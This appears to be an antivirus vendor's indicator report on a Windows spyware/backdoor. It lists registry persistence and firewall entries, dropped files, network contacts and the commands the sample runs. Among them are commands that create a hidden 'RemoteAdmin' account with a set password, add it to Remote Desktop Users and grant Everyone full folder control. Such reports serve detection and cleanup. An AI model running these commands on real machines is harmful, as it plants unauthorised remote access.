Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ccAppRemXP' = '%WINDIR%\msn64.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\vzones\smss.exe' = '%WINDIR%\vzones\smss.exe:*:Enabled:smss.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\msn64.exe' = '%WINDIR%\msn64.exe:*:Enabled:Transparent Proxy Server'
- hidden files
- %WINDIR%\vzones\services.exe
- %WINDIR%\msn64.exe
- %TEMP%\Compress0\desktop.exe
- %WINDIR%\vzones\smss.exe
- <SYSTEM32>\net1.exe localgroup %USERNAME%s /Add RemoteAdmin
- <SYSTEM32>\net1.exe localgroup users /Delete RemoteAdmin
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" /Add RemoteAdmin
- <SYSTEM32>\cacls.exe %WINDIR%\vzones /G Everyone:f
- <SYSTEM32>\cacls.exe %PROGRAM_FILES%\Accessories\Common /G Everyone:f
- <SYSTEM32>\net1.exe user RemoteAdmin ecotopia /add
- bdss.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- %TEMP%\Compress0\ushost.dll
- %TEMP%\Compress0\user.dll
- %TEMP%\Compress0\update.dll
- %TEMP%\Compress0\webas.dll
- %TEMP%\Compress0\ziplog.txt
- %TEMP%\Compress0\winsyst32.exe
- %TEMP%\Compress0\unir.exe
- %TEMP%\Compress0\seekil.dll
- %TEMP%\Compress0\seek.dll
- %TEMP%\Compress0\scloc.dll
- %TEMP%\Compress0\services.exe
- %TEMP%\Compress0\unin.dll
- %TEMP%\Compress0\type.dll
- %TEMP%\Compress0\ssap.dll
- %PROGRAM_FILES%\Accessories\Common\clog.txt
- %PROGRAM_FILES%\Accessories\Common\log.txt
- %WINDIR%\rsvert.dll
- %WINDIR%\slog.dll
- %PROGRAM_FILES%\Accessories\Common\WebsitesDetail.txt
- %PROGRAM_FILES%\Accessories\Common\WebsitesSummary.txt
- %PROGRAM_FILES%\Accessories\Common\OnlineTime.txt
- %PROGRAM_FILES%\Accessories\Common\desktop.ini
- %WINDIR%\msn64.exe
- %WINDIR%\vzones\smss.exe
- %WINDIR%\vzones\services.exe
- %WINDIR%\ruto32.exe
- <SYSTEM32>\MSWINSCK.OCX
- %WINDIR%\ziplog.txt
- %WINDIR%\refsdm.dll
- %TEMP%\Compress0\scint2.dll
- %TEMP%\Compress0\mailkl.dll
- %TEMP%\Compress0\mail.dll
- %TEMP%\Compress0\inuser.dll
- %TEMP%\Compress0\mailsc.dll
- %TEMP%\Compress0\oem.dll
- %TEMP%\Compress0\MSWINSCK.OCX
- %TEMP%\Compress0\msn.exe
- %TEMP%\Compress0\inter.dll
- %TEMP%\Compress0\desktop.exe
- %TEMP%\Compress0\delkl.dll
- %TEMP%\Compress0\ass.dll
- %TEMP%\Compress0\dete.dll
- %TEMP%\Compress0\inmsg.dll
- %TEMP%\Compress0\ften.dll
- %TEMP%\Compress0\dunin.dll
- %TEMP%\Compress0\scan.dll
- %TEMP%\Compress0\rwcs.dll
- %TEMP%\Compress0\rwci.dll
- %TEMP%\Compress0\sccle.dll
- %TEMP%\Compress0\scint.dll
- %TEMP%\Compress0\scen.dll
- %TEMP%\Compress0\scday.dll
- %TEMP%\Compress0\rwce.dll
- %TEMP%\Compress0\refsdm.dll
- %TEMP%\Compress0\pwhost.dll
- %TEMP%\Compress0\port.dll
- %TEMP%\Compress0\resu.dll
- %TEMP%\Compress0\rvport.dll
- %TEMP%\Compress0\rvhost.dll
- %TEMP%\Compress0\rmdesk.dll
- %TEMP%\Compress0\scen.dll
- %TEMP%\Compress0\scday.dll
- %TEMP%\Compress0\sccle.dll
- %TEMP%\Compress0\scloc.dll
- %TEMP%\Compress0\scint2.dll
- %TEMP%\Compress0\scint.dll
- %TEMP%\Compress0\rwce.dll
- %TEMP%\Compress0\rvport.dll
- %TEMP%\Compress0\rvhost.dll
- %TEMP%\Compress0\scan.dll
- %TEMP%\Compress0\rwcs.dll
- %TEMP%\Compress0\rwci.dll
- %TEMP%\Compress0\seek.dll
- %TEMP%\Compress0\ushost.dll
- %TEMP%\Compress0\user.dll
- %TEMP%\Compress0\update.dll
- %TEMP%\Compress0\ziplog.txt
- %TEMP%\Compress0\winsyst32.exe
- %TEMP%\Compress0\webas.dll
- %TEMP%\Compress0\ssap.dll
- %TEMP%\Compress0\services.exe
- %TEMP%\Compress0\seekil.dll
- %TEMP%\Compress0\unir.exe
- %TEMP%\Compress0\unin.dll
- %TEMP%\Compress0\type.dll
- %TEMP%\Compress0\dete.dll
- %TEMP%\Compress0\desktop.exe
- %TEMP%\Compress0\delkl.dll
- %TEMP%\Compress0\inmsg.dll
- %TEMP%\Compress0\ften.dll
- %TEMP%\Compress0\dunin.dll
- %TEMP%\~DF54D.tmp
- %TEMP%\~DFFBDB.tmp
- %TEMP%\~DF1451.tmp
- %TEMP%\Compress0\ass.dll
- %TEMP%\~DF454C.tmp
- %TEMP%\~DFA33B.tmp
- %TEMP%\Compress0\inter.dll
- %TEMP%\Compress0\pwhost.dll
- %TEMP%\Compress0\port.dll
- %TEMP%\Compress0\oem.dll
- %TEMP%\Compress0\rmdesk.dll
- %TEMP%\Compress0\resu.dll
- %TEMP%\Compress0\refsdm.dll
- %TEMP%\Compress0\mailkl.dll
- %TEMP%\Compress0\mail.dll
- %TEMP%\Compress0\inuser.dll
- %TEMP%\Compress0\MSWINSCK.OCX
- %TEMP%\Compress0\msn.exe
- %TEMP%\Compress0\mailsc.dll
- 'localhost':1041
- '69.#6.18.49':14001
- DNS ASK www.wi##spy.com
- DNS ASK ya##o.com
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'